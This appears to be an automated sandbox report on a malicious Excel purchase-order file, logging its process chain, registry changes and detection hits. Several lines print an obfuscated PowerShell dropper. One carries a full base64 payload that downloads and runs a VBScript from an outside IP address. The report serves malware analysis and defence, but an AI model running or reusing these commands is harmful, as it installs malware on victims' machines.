        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | File read: C:\Users\desktop.ini
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
        Source: C:\Windows\System32\mshta.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | File read: C:\Windows\System32\drivers\etc\hosts
        Source: Orden_de_Compra_Nmero_6782929219.xls | ReversingLabs: Detection: 13%
        Source: Orden_de_Compra_Nmero_6782929219.xls | Virustotal: Detection: 14%
        Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE "C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
        Source: C:\Windows\System32\mshta.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'JGNGT0hOanFQbCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIEFkZC1UeXBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tZU1CZVJkZUZJTmlUaU9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1cmxNT24uZExMIiwgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgQ2hhclNldCA9IENoYXJTZXQuVW5pY29kZSldcHVibGljIHN0YXRpYyBleHRlcm4gSW50UHRyIFVSTERvd25sb2FkVG9GaWxlKEludFB0ciAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsZWFGUUh5ZyxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgVHh0LHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBsTU0sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBlTW52bEhRb3AsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGtmYmV1bVIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5BbUUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgImdOdyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hbWVzcEFDRSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBMVXRKQlYgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAkY0ZPSE5qcVBsOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTcyLjI0NS4xNDIuNjAvNDY2L2tpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlc3Rmb3JtZS50SUYiLCIkRU52OkFQUERBVEFca2lkc25pY2Vmb3JtZXRvZ2V0YmFja2dyZWF0dGhpbmdzd2l0aG5ldGllcnRpbWVnaXZlbm1lYmVzLnZiUyIsMCwwKTtTdEFSdC1zTGVFcCgzKTtJblZvS0UtRXhQUkVTc2lvTiAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVOVjpBUFBEQVRBXGtpZHNuaWNlZm9ybWV0b2dldGJhY2tncmVhdHRoaW5nc3dpdGhuZXRpZXJ0aW1lZ2l2ZW5tZWJlcy52YlMi'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\cmd.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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'+[CHaR]0X22+'))')))"
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe" -Embedding
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES476D.tmp" "c:\Users\user\AppData\Local\Temp\izhw321o\CSCDC8260CFBF8C4877B302B76AFCC254F.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = '[base64 payload removed]';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe "C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe" --backgroundcolor=16514043
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process created: C:\Windows\System32\mshta.exe C:\Windows\System32\mshta.exe -Embedding
        Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'[base64 payload removed]'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'[base64 payload removed]'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA5F0.tmp" "c:\Users\user\AppData\Local\Temp\24vqjdjh\CSCC170874EB5994B058785371DF20B8BA.TMP"
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process created: unknown unknown
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process created: unknown unknown
        Source: C:\Windows\System32\mshta.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{25336920-03F9-11CF-8FD0-00AA00686F13}\InProcServer32
        Source: C:\Windows\System32\mshta.exe Key opened: HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Settings
        Source: Window Recorder Window detected: More than 3 window changes detected
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe File opened: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\mscorrc.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItems
        Source: Orden_de_Compra_Nmero_6782929219.xls Static file information: File size 1071616 > 1048576
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.pdb source: powershell.exe, 00000007.00000002.444981624.00000000029D6000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.pdb source: powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.pdbhP source: powershell.exe, 00000014.00000002.496191846.0000000002523000.00000004.00000800.00020000.00000000.sdmp
        Source: Binary string: 7C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.pdbhP source: powershell.exe, 00000007.00000002.444981624.00000000030D9000.00000004.00000800.00020000.00000000.sdmp
        Source: Orden_de_Compra_Nmero_6782929219.xls Initial sample: OLE indicators encrypted = True

        Data Obfuscation

        Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'<base64 payload omitted>'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'<base64 payload omitted>'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = '<base64 payload omitted>';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899A022D push eax; iretd 7_2_000007FE899A0241
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Code function: 7_2_000007FE899A00BD pushad ; iretd 7_2_000007FE899A00C1

        Persistence and Installation Behavior

        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Registry value created: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\SystemCertificates\ROOT\Certificates\12891DF7B048CD69D0196C8AD7A754C8A812A08C Blob
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe File created: C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.dll
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\cmd.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroCEF\RdrCEF.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\mshta.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\wscript.exe Process information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
        Source: Orden_de_Compra_Nmero_6782929219.xls Stream path 'MBD00068A0F/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
        Source: Orden_de_Compra_Nmero_6782929219.xls Stream path 'Workbook' entropy: 7.99865450094 (max. 8.0)
        Source: 54330000.0.dr Stream path 'MBD00068A0F/MBD007203CB/Workbook' entropy: 7.97416832031 (max. 8.0)
        Source: 54330000.0.dr Stream path 'Workbook' entropy: 7.9988158637 (max. 8.0)
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 922337203685477
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Thread delayed: delay time: 600000
        Source: C:\Windows\System32\wscript.exe Window found: window name: WSH-Timer
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7515
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2342
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2647
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 7200
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 940
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 2409
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 1557
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Window / User API: threadDelayed 6621
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.dll
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.dll
        Source: C:\Windows\System32\mshta.exe TID: 3612 Thread sleep time: -360000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3756 Thread sleep count: 7515 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3756 Thread sleep count: 2342 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3904 Thread sleep time: -360000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3908 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2968 Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908 Thread sleep time: -5534023222112862s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908 Thread sleep time: -1200000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1908 Thread sleep time: -600000s >= -30000s
        Source: C:\Windows\System32\mshta.exe TID: 1884 Thread sleep time: -540000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604 Thread sleep count: 940 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3604 Thread sleep count: 2409 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 1316 Thread sleep time: -180000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 2920 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3644 Thread sleep time: -1844674407370954s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3960 Thread sleep count: 1557 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3952 Thread sleep count: 6621 > 30
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 3700 Thread sleep time: -60000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 652 Thread sleep time: -15679732462653109s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 652 Thread sleep time: -1200000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe TID: 652 Thread sleep time: -600000s >= -30000s
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process information queried: ProcessInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process token adjusted: Debug

        HIPS / PFW / Operating System Protection Evasion

        Source: Yara match File source: Process Memory Space: powershell.exe PID: 4092, type: MEMORYSTR
        Source: Yara match File source: Process Memory Space: powershell.exe PID: 3832, type: MEMORYSTR
        Source: C:\Windows\System32\mshta.exe Process created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" "/c poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\cmd.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe poWerSHell.eXE -Ex bypasS -NOP -w 1 -c DevIcECreDenTiALDepLOyment ; inVoKE-eXPRESsion($(INvOkE-expReSSIOn('[SYsTEM.TeXt.EncoDINg]'+[CHaR]0x3a+[cHar]58+'utf8.geTStRINg([SYsTEm.CONverT]'+[chAr]58+[cHaR]58+'FRoMBASE64strinG('+[char]0X22+'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'+[CHaR]0X22+'))')))"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\izhw321o\izhw321o.cmdline"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\kidsniceformetogetbackgreatthingswithnetiertimegivenmebes.vbS"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES476D.tmp" "c:\Users\user\AppData\Local\Temp\izhw321o\CSCDC8260CFBF8C4877B302B76AFCC254F.TMP"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\24vqjdjh\24vqjdjh.cmdline"
        Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exe Process created: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework64\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RESA5F0.tmp" "c:\Users\user\AppData\Local\Temp\24vqjdjh\CSCC170874EB5994B058785371DF20B8BA.TMP"
        Source: C:\Windows\System32\wscript.exe Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $portioned = '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';$reprovals = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($portioned));Invoke-Expression $reprovals
